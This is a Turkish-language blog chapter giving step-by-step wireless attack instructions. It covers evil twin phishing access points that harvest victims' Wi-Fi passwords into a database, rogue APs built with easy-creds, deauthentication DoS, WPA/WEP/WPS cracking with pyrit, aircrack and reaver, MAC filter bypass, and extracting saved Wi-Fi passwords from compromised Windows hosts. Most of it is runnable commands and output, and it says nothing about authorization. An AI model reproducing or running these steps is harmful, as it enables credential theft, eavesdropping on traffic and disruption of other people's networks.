Kablosuz Aglarda Gerçekleştirilen Saldırılar

14. KABLOSUZ AĞLARDA GERÇEKLEŞTİRİLEN SALDIRILAR

14.1 Kablosuz Ağ Adaptörünün Monitoring Moda Alınması

Cihazımızın wifi kartı veya WİFİ adaptörü ile wifi ağlarını etraftaki gelen ve giden paketleri sniff etmek için monitoring moda geçirmemiz gerekmektedir. Monitoring modu aktif etmeyi göstermeden önce eğer ki notebook’unuz wifi kartını desteklemiyor ise hangi wifi adaptörünü önereceğimi aşağıda paylaşmak istiyorum. (Bende detaylarını ve tecrübeleri internet üzerinden araştırdım. Ben kendim TP-LİNK TL-WN722N kullanıyorum , sizde ürünlerin performanslarını ve hangi adaptörün monitoring modu olduğunu internet üzerinden araştırabilirsiniz)

TP-LINK TL-WN727N 150 Mbps N Kablosuz WPS USB Adaptör Fiyatı

TP-LINK TL-WN722N 150 Mbps N Kablosuz Yüksek Kazanımlı 4dBi Fiyatı

TP-LINK TL-WN821N 300 Mbps N Kablosuz WPS USB Adaptör Fiyatı

TP-LINK TL-WN823N 300 Mbps N Kablosuz WPS/Soft AP Mini USB Fiyatı

Dark RangeMax 300mbit 5dbi Kablosuz Ağ Adaptörü DK-NT-WDN305

ALFA Wifi Adaptörleri

Eğer ki cihazınız ile ilgili her şey tamam ve artık sniff edicek duruma geldiyseniz , nasıl monitoring moda alındığını göstermeye başlıyalım.

Monitoring Mode Nedir:

Çekim alanındaki kablosuz ağları tespit etmeyi ve ürettikleri trafikleri izlemeyi sağlar.

1)Kablosuz Usb Adaptörü Bilgisayarınıza Takın ve Sanal Makine’de bunu aktif edin.(Eğer ki sanal bir makine kullanıyorsanız.)

Kablosuz Aglarda Gerçekleştirilen Saldırılar

2)iwconfig Komutu ile Kablosuz Usb ağ Adaptörünün Çalışıp Çalışmadığını Kontrol Edin.

Kablosuz Aglarda Gerçekleştirilen Saldırılar

3) “Airmon-ng start (adaptorname)” komutu, monitoring modu çalıştırmamıza yarar fakat bazı durumlarda bazı toollar çalıştırmamıza engel olabilir. (Örnek aşağıda ki görsel). O Tür durumlarda farklı komutlar kullanabiliriz.

Kablosuz Aglarda Gerçekleştirilen Saldırılar

Bu tür durumda ” airmon-ng check kill” komutunu kullanarak toolları stop edebilir ve ardından tekrar çalıştırabiliriz. (Aşağıda ki görsel gibi )

Kablosuz Aglarda Gerçekleştirilen Saldırılar

3) Artık monitoring modumuz aktif ve sniff etme işlemine başlayabiliriz. Ek olarak wifi adaptörümüzün injection saldırılarını destekleyip desteklemedeiğini gözlemlemek için “aireplay-ng -9 (adaptorname) ” yazarak ögrenebiliriz. 

Kablosuz Aglarda Gerçekleştirilen Saldırılar

14.2 Easy-Creds ile Sahte Kablosuz Ağ Oluşturulması

Easy-Creds Programı Nedir?
Eaasy Creds Sahte Kablousuz Ağ saldırısı Gerçekleştirmek için Gereken Çeşitli paketleri otomatik kurarak işimizi kolaylaştıran bir betiktir.
Easy Creds ile Arp Posioning , dhcp Snooping veya Sahte Kablosuz Ağ saldırıları Gerçekleştirebiliriz.

Easy Creds Programının bizim için Otamatik Yüklediği Paketler:
* screen
* freeradius (with wpe patches)
* hamster
* ferret
* sslstrip
* dsniff
* urlsnarf
* metasploit
* airbase-ng
* airodump-ng
* hostapd
* mdk3
* ipcalc
* asleap

EASY CREDS PROGRAMININ KURULUMU

1)Easy creds Programını İndirin.(https://github.com/brav0hax/easy-creds.git)

Kablosuz Aglarda Gerçekleştirilen Saldırılar

2)İndirdiğimiz dosyasyı açıp Kurulum betiğini Çalıştıralım.

git clone https://github.com/brav0hax/easy-creds.git
cd easy-creds/
chmod u+x installer.sh
./installer.sh

3)Kurulumu Yaptığımız Sunucunun İşletim sistemini belirtiyoruz.Kali’ye Kurulum yaptığımız için 1 seçiyoruz.

Kablosuz Aglarda Gerçekleştirilen Saldırılar

4)Kurulumun Yapılacağı klasörü seçiyoruz.

Kablosuz Aglarda Gerçekleştirilen Saldırılar

5)Kurulum bittikten Sonra /opt/easy-creds/easy-creds.sh dosyasını açarak 730-731 satırlarında ki dhcp3 ifadesini dhcp olarak değiştiririz.

730   if [ -e /etc/dhcp3/dhcpd.conf ]; then
731               dhcpd3 -q -cf ${DHCPPATH} -pf /var/run/dhcp3-server/dhcpd.pid ${TUNIFACE} &
#İlk Hali

730   if [ -e /etc/dhcp/dhcpd.conf ]; then
731                dhcpd -q -cf ${DHCPPATH} -pf /var/run/dhcp-server/dhcpd.pid ${TUNIFACE} &
#Güncelledikten Sonraki Hali

ADIM ADIM SAHTE KABLOSUZ ERİŞİM NOKTASININ OLUŞTURULMASI 
1)Usb Wifi Adaptörünğ Laptopa Takarak Sanal Makineye Bağlayın.

2)Easy-creds programını Başlatın
easy-creds

3)FakeAP Attack türünü seçin.(Sahte Kablosuz Ağ Saldırısı )

Kablosuz Aglarda Gerçekleştirilen Saldırılar

4)Static attack tipini seçiniz.

Kablosuz Aglarda Gerçekleştirilen Saldırılar

5)N Seçeneğini seçiniz.
Would you like to include a sidejacking attack? [y/N]: N

6)eth0 interface’ini seçiniz.

Kablosuz Aglarda Gerçekleştirilen Saldırılar

7) wireless interface ismini wlan0 olarak seçiniz.

Kablosuz Aglarda Gerçekleştirilen Saldırılar

8) Oluşturulacak sahte wifi adresinin adını ve kanal numarasını giriniz.
Kablosuz Ağın Adını Herkesin Bağlanmak isteyeceği Bir isim verbilirsiniz örnek olarak Ücretsiz Wifi .
ESSID you would like your rogue AP to be called, example FreeWiFi: FreeHotspot
Channel you would like to broadcast on: 9

9) Monitor Kablosuz Ağ Adını Seçiniz. biz mon0 olarak seçiyoruz.:

Kablosuz Aglarda Gerçekleştirilen Saldırılar

10)
Would you like to change your MAC address on the mon interface? [y/N]: N

11)
Enter your tunnel interface, example at0: at0

12)
Do you have a dhcpd.conf file to use? [y/N]: N

 

13) Kullanıcak Ağ adresini ve Dns Sunucu ip adresini giriniz.

Kablosuz Aglarda Gerçekleştirilen Saldırılar

Kablosuz Aglarda Gerçekleştirilen Saldırılar

14)Artık Sahte Kablousuz Erişim Noktasına Bağlanan Kurbanlara ait kullanıcı ve şifre bilgilerini görebiliriz. Tabi bunları görmek için ettercap kullanmamız gerekecek.

14.3 Ewil Twin - Şeytani İkiz Atağı

Ewil Twin(Şeytani İkiz) Atağı Nedir?
Şeytani ikiz atağı ,Gerçek Wifi Erişim Noktasının birebir Kopyası oluşturularak gerçekleştirilen , kablosuz ağlarda ki kimlik avı dolandırıcılığı Saldırılarıdır.
Şeytani İkiz Atağı Sayesinde Şifre Kırma işlemi ile uğraşmadan daha kolay ve hızlı bir şekilde Kablosuz Ağları Hackleyebiliriz.
Saldırı Nasıl Gerçekleştirilir:
1) Saldırgan Gerçek wifi Erişim Noktası İle Aynı İsimde sahte wifi Erişim Noktası Oluşturur.
2)Saldırgan Kopyasını Oluşturduğu Gerçek Wifi Erişim Noktasına Bağlı Olan Clientlardan birini kurban olarak seçer ve onun bağlantısını koprtarak kndi oluşturduğu kopya(Şeytani ikiz) Wifi Erişim Noktasına Bağlanmasını Sağlar.
3)Saldırgan Kendisine Bağlanan Kurbanı Wifi Şifresi İsteyen Sahte Web Sitesine Yönlendirir.
4)Eğer Kurban ikna olur ve Wifi Şifresini girerse Saldırı Başarılı Şekilde Gerçekleştirilmiş olur.

ADIM ADIM SALDIRININ GERÇEKLEŞTİRİLMESİ

1)Usb Wifi Adaptörün takıp Kali Sunucumuz Üzerinden Kontrol Ediyoruz. Burada eth0 internete Çıkmak için kullandığımız, wlan0 ise saldırıları gerçekleştirmek için kullandığımız interfacelerdir.

Kablosuz Aglarda Gerçekleştirilen Saldırılar

#192.168.26.130 ip adresi saldırıda kullandığımız kali suncusunun ip adresi.(Kali sunucu network ayarı nat olarak seçili).
Kablosuz Aglarda Gerçekleştirilen Saldırılar

2)wlan0 Wifi Adaptörünü Monitoring Mod’a Alırız ve Analiz Edebilmek için Kablosuz Ağ trafiğini yakalamaya başlarız.

airmon-ng check kill

airmon-ng start wlan0
#Monitoring Moda Aldık.

airodump-ng wlan0
#Komutu yazarak ortamda bulunan tüm wifi ağlarının bilgilerini görebiliyor olacağız.

Kablosuz Aglarda Gerçekleştirilen Saldırılar

3)Hedef Wifi Erişim Noktası İle AYnı Kanalda AYnı isimde Sahte Wifi Erişim Noktası Oluştururuz.
airbase-ng  -e “Suat” -c 1 -a 00:12:23:34:45:56 mon0
05:42:09  Created tap interface at0
05:42:09  Trying to set MTU on at0 to 1500
05:42:09  Trying to set MTU on mon0 to 1800
05:42:10  Access Point with BSSID 00:12:23:34:45:56 started.

4)Dhcp Servisinin Yükleriz ve Yapılandırmasını Yaparız.

apt-get install dhcp3-server
cat /etc/dhcp3/dhcpd.conf
ddns-update-style none;
log-facility local7;
subnet 192.168.101.0 netmask 255.255.255.0 {
range 192.168.101.100 192.168.101.200;
option domain-name-servers 8.8.8.8;
option routers 192.168.101.1;
option broadcast-address 192.168.101.255;
default-lease-time 600;
max-lease-time 7200;

5)Saldırıda Kullanacağımız at0 interfacini oluştururuz, Gerekli route Kuralını Ekleriz ve dhcp servisini başlatırız.

ifconfig at0 up
ifconfig at0 192.168.101.1 netmask 255.255.255.0
# at0 interfacini oluşturduk..

route add -net 192.168.101.0 netmask 255.255.255.0 gw 192.168.101.1
##Gerekli route Kuralını Ekledik.

dhcpd -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcpd.pid at0
#-cf: alternatif Konfigurasyon dosyasının Yolunu Belirtir.
#-pf:Alternatif pid Dosyasının Yolunu Belirtiriz.

6) Gerekli iptables kuralını ekleriz ve ipv4 routing Özelliğinşi Aktif Ederiz.

iptables -F
iptables -t nat -F
iptables –delete-chain
iptables -t nat -A POSTROUTING –out-interface eth0 -j MASQUERADE
iptables -A FORWARD –in-interface at0 -j ACCEPT
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp –dport 80 -j DNAT –to-destination 192.168.26.130:80

iptables -t nat -A POSTROUTING -j MASQUERADE

7)Kurbanı Yönlendireceğimiz ve şifre isteyeceğimiz sahte web Sayfasını Oluştururuz.

cd /var/www
mv index.html inde.html.old
wget https://cdn.rootsh3ll.com/u/20180724181033/Rogue_AP.zip
unzip Rogue_AP.zip
/etc/init.d/mysql start
/etc/init.d/apache2 start

mysql -u root -p
mysql>create user fakeap@localhost identified by ‘fakeap’;
mysql> create database rogue_AP;
mysql> use rogue_AP;
mysql> create table wpa_keys(password1 varchar(32), password2 varchar(32));
mysql> grant all privileges on rogue_AP.* to ‘fakeap’@’localhost’;
mysql> mysql -u fakeap -p
mysql> use rogue_AP;
mysql> insert into wpa_keys(password1, password2) values (“testpass”, “testpass”);
mysql> select * from wpa_keys;

8) Kurbanı Hedef Wifi Erişim Noktasından Düşürürüz.(Böylece Kurban Bizim Oluşturduğumuz Şeytani ikiz wifisine Bağlanır.)

aireplay-ng –deauth 100 -a 10:A5:D0:04:5B:CB  -c 5C:E8:EB:E2:1E:DE mon0

 

9)Gördüğümüz gibi Kurbanı Bağlı Bulunduğu wifiden düşürdükten Sonra Bizim Sahte Kablosuz Ağımıza Bağlandı.

airbase-ng  -e “suat” -c 1 -a 00:12:23:34:45:56 mon0

05:42:09  Created tap interface at0
05:42:09  Trying to set MTU on at0 to 1500
05:42:09  Trying to set MTU on mon0 to 1800
05:42:10  Access Point with BSSID 00:12:23:34:45:56 started.
05:58:11  Client 5C:E8:EB:E2:1E:DE associated (unencrypted) to ESSID: ” suat “
05:58:11  Client 5C:E8:EB:E2:1E:DE associated (unencrypted) to ESSID: ” suat “
05:58:11  Client 5C:E8:EB:E2:1E:DE associated (unencrypted) to ESSID: ” suat “
05:58:11  Client 5C:E8:EB:E2:1E:DE associated (unencrypted) to ESSID: ” suat “
05:58:11  Client 5C:E8:EB:E2:1E:DE associated (unencrypted) to ESSID: ” suat “
05:58:11  Client 5C:E8:EB:E2:1E:DE associated (unencrypted) to ESSID: ” suat “

10)Kurban Şifreyi Girdikten Sonra evil_twin Veritabanını Seçeriz ve wpa_keys Tablosundan Şifreyi görebiliriz.

mysql -u fakeap -p
use Rogue_AP;
select * from wpa_keys ;

14.4 Pyrit Programı ile WPA/WPA2 Şifrelerin Kırılması

Pyrit Programı Nedir?
Pyrit WPA/WPA2-PSK Şifrelerini kırmak için geliştirilmiş bir yazılımdır. En önemli özelliği CPU’ya ek olarak Nvdia ve Ati ekran kartlarının grafik işlemcilerini kullanarak parola kırma işlemi yapmasıdır. Özellikle yeni nesil gelişmiş ekran kartlarıyla oldukça iyi performans verebilir ve daha hızlı bir şekilde hash’leri kırmamızı sağlayabilir.

Cpu Ve Gpu le Şifre Kırma Testleri
Intel Pentium : 1400/s
Intel I7: 6500/s
Raedon: 35.000/s

Kullanılabilecek Cpu Ve Gpu ‘ların Listelenmesi

pyrit list_cores

Sisteminizde ki Cpu ve Gpu’ların Performans testleri:.

pyrit benchmark

1)Usb Wifi Adaptörünü Taktıktan sonra ortamda ki Wpa/Wpa2 Kullanan Kablosuz ağları Keşfedin..

iwconfig
#Kablosuz Adaptörü Kontrol Edelim.Wlan0 kablosuz ağ adaotörünğ Monitoring Moda Alın.

airmon-ng check kill
airmon-ng start wlan0
#Kablosuz Ağ trafiğini yakalamaya Başlayın.

Kablosuz Aglarda Gerçekleştirilen Saldırılar

“Sysfs injection support was not found either” Hatasını Alırsanız:

ifconfig wlan0 down

iwconfig wlan0 mode monitor

ifconfig wlan0 up

airodump-ng wlan0

2)Handshake Yakalamaya Başlayın.

Kablosuz Aglarda Gerçekleştirilen Saldırılar

3)Handshake yakalayabilmek için clienti Ağdan Düşürün.

aireplay-ng –deauth 100 -a 10:A5:D0:04:5B:CB -c 40:F3:08:E4:6E:28  mon0

4) Pyrit ile Yakaladığımız hanshakei Analiz edelim.

pyrit -r wpahashfile-01.cap analyze

5)Pyrit ile Şifre Kırma Saldırısını Başlatın.
pyrit -r  wpahashfile-01.cap -i /usr/share/wordlists/rockyou.txt -b 10:a5:d0:04:5b:cb  attack_passthrough
Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+
Parsing file ‘wpahashfile-01.cap’ (1/1)…
Parsed 19 packets (19 802.11-packets), got 1 AP(s)
Tried 1260063 PMKs so far; 1469 PMKs per second.

The password is ‘suat1234’.

14.5 SSID'si Gizli Olan Ağların Bulunması

airmon-ng start wlan0
airodump-ng wlan0(Ağ  tarama başlatır.)
#Ortamdaki kablosuz ağların BSSID değerleri ve onlara bağlanan clientlar bulunur.

(airodump-ng –channel Kablosuz_Ağın-Kanal-numarasi –bssid Bulunan-BSSID-Değeri wlan0)
airodump-ng –channel 11 –bssid 18:28:61:95:82:8C wlan0
#ESSID’si gizlenmiş olan kablosuz ağın BSSID değerini girerek bu ağa bağlı herhangi bir clientin mac adresini buluruz.

(aireplay-ng –deauth 100 -a Hedef-KablosuzAğ-Bssid_değeri -c Hedef-Ağa-Bağlı-Client-mac-adresi  wlan0)
aireplay-ng –deauth 100 -a 18:28:61:95:82:8C -c A4:EE:57:FD:5F:1A   wlan0
#Az önce bulduğumuz clienti ağ’dan düşürürüz.Böylece client tekrar bağlanırken sniff edebiliriz.

airodump-ng –channel 11 –bssid 18:28:61:95:82:8C wlan0
CH  11 ][ Elapsed: 2 mins ][ 2014-12-15 07:43  
#Client düşüp tekrar girerken sniff ettik ve ESSID’si gizli olan ağın ESSID değerini bulduk.

14.6 Wep Şifreleme Kullanan Kablosuz Ağlarda Şifre Kırma Saldırısı

airmon-ng start wlan0
airodump-ng wlan0
#Saldırı yapmak istediğimiz WEP kullılan kablosuz ağın ESSID,BSSID ve Client-mac bilgilerini elde ederiz.

(airodump-ng –channel Hedef-Ağın-Kanal-numarasi –bssid  Hedef-Ağın-Bssid-Değeri  –ivs -w suat mon0)
airodump-ng –channel 6 –bssid E0:19:1D:CF:61:14  –ivs -w suat mon0

#Hedef ağ üzerinden iv paketleri toplayarak suat isimli dosyaya kaydederiz.

aircrack-ng suat.ivs
#aircrack aracı ile aldığımız hashleri kırmaya çalışırız.

14.7 WPA Şifreleme Kullanan Kablosuz Ağlara Şifre Kırma Saldırısı

airmon-ng start wlan0
airodump-ng wlan0
#Saldırı yapmak istediğimiz WPA kullılan kablosuz ağın ESSID,BSSID ve Client-mac bilgilerini elde ederiz.

(aiorodump-ng -channel hedef-ağın-kanal-numarasi –bssid hedef-ağın-bssid-değeri   -w suattest mon0)
aiorodump-ng -channel 1 –bssid CC:CC:QQ:q8:q1:5F   -w suattest mon0
#Saldırmak istediğimiz kablosuz ağ dan wpa handshake yakalanıp suattest dosyasında kaydedilmesi için yukardaki komutu kullanabiliriz.

(aireplay-ng –deauth 100 -a hedef-ağın-bssid-değeri -c Hedef-Ağa -bağlı-client-mac-adresi  mon0)
aireplay-ng –deauth 100 -a CC:CC:QQ:q8:q1:5F -c 09:33:AA:QQ:CC:ZZ  mon0
#wpa handshake yakalayabilmek için mevcut bağlı clientlerden birini ağdan düşürürüz.

aircrack-ng suattest.cap -w /usr/share/wordlists/wordlist.txt
#Elde ettiğimiz wpa handshake brute force ile kırmaya çalışırız.

14.8 WPS Destekli Kablosuz Ağların Keşfi ve Şifre Kırma Saldırısı

WPS nedir ? WPS (Wifi Protected Setup) olarak geçmektedir. Korumalı kablosuz kurulum olarak adlandırılır. Amacı en basit bir şekilde güvenli ağa erişim sağlamaktır. WPS i normalde modemlerinizin yanında yada yazıcılarda ek bir tuş olarak görmüşsünüzdür.PIN Yönetimi ile bağlantı sağlar . Toplamda 4-4 (8) karakterli bir şifre yönlendirerek bağlantı gerçekleştirir. İlk 4 şifreyi yönlendirir ve connection sağlar ardından diğer 4 pın’i gönderir. PIN olduğu için algoritmalarla saatlerce yada günlerce deneyerek bulacağımız algoritmalar mevcut. Modemlerinizin yada cihazlarınızın arka veya üstünde pin şifreleri genelde yazmaktadır.

Kablosuz Aglarda Gerçekleştirilen Saldırılar Kablosuz Aglarda Gerçekleştirilen Saldırılar Kablosuz Aglarda Gerçekleştirilen Saldırılar

airmon-ng start wlan0
#Monitoring Moda alırız.

wash -i mon0 –C
# Ortamdaki wps destekli kablosuz ağları buluruz.

reaver -i mon0 -b 01:01:01:01:00:00 -c 9 -vv –no-nack -d 5 -f -x298
#Wps destekli ağın BSSSId değer ve kanal numarasını yazarak bu ağı kırabiliriz.

14.9 Sahte Kablosuz Ağ Oluşturulması

airmon-ng start wlan0
airbase-ng -e munuklu-fake -c 11 -v wlan0
#Hedef  alınan kurum içerisinde kurumda kullanılan kablosuz ağ ismine benzer bir ağ oluştrrurak sahte kablosuz ağımıza başlanmalarını sağlayabiliriz.Böylece bizim oluşturduğumuz sahte kablsuz ağa bağlanan kişilerin trafiği
bizim üzerimizden geçeği için networkü sniff ederek kullanıcıların şifrelerini çalabiliriz.

14.10 Kablosuz Ağlarda DOS Saldırıları

Airodump-ng wlan0
#Ortamdaki kablosuz ağlar tespit edilir.Tespit ettikten sonra saldırı yapacağımız ağın BSSID ve Channel numarasını ögreniriz.

iwconfig wlan0mon channel 7
#Ögrendiğimiz ve saldırı yapacağımız ağın channel numarasını monitoring modda olan wifi adaptörümüze yönlendiririz.

aireplay-ng –deauth 1000 -a Hedef-alinan-kablosuz-ağın-BSSID-Değeri wlan0
#Hedef kablosuz ağdaki tüm clientleri düşürmek için.

aireplay-ng –deauth 1000 -a Hedef-Alinan Kablosuz-ağın-BSSID-Değeri -c Hedef-Alinan-Client-MAC-Adresi wlan*
#Sadece bir clienti ağ’dan düşürmek için kullanabiliriz

14.11 Kablosuz Ağlarda MAC Adresi Filtrelemesi Önleminin Atlatılması

airdump-ng wlan0
#Ortamdaki kablosuz ağları buluruz ve seçtiğimiz kablosuz ağa bağlı bir clientin mac adresini tespit ederiz.
macchanger -m Yerine-Geçmek-istediğimiz-clientin-mac-adresi wlan0
#wlan0 ağ adaptörünün mac adresini hedef kablosuz ağdaki bir clientin mac adresinin mac adresi ile değiştirriz.

14.12 Windows Makinalarda Kayıtlı Wifi Parolarının Bulunması

Ele Geçirdiğimiz Windows Sistemlerde Daha Önce Girilmiş Tüm Kablosuz Ağların Şifrelerini Elde Etmek İçin WirelessKeyView İsimli Uygullamayı Kullanabiliriz.

Kablosuz Aglarda Gerçekleştirilen Saldırılar

You may also like...

Bir yanıt yazın

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir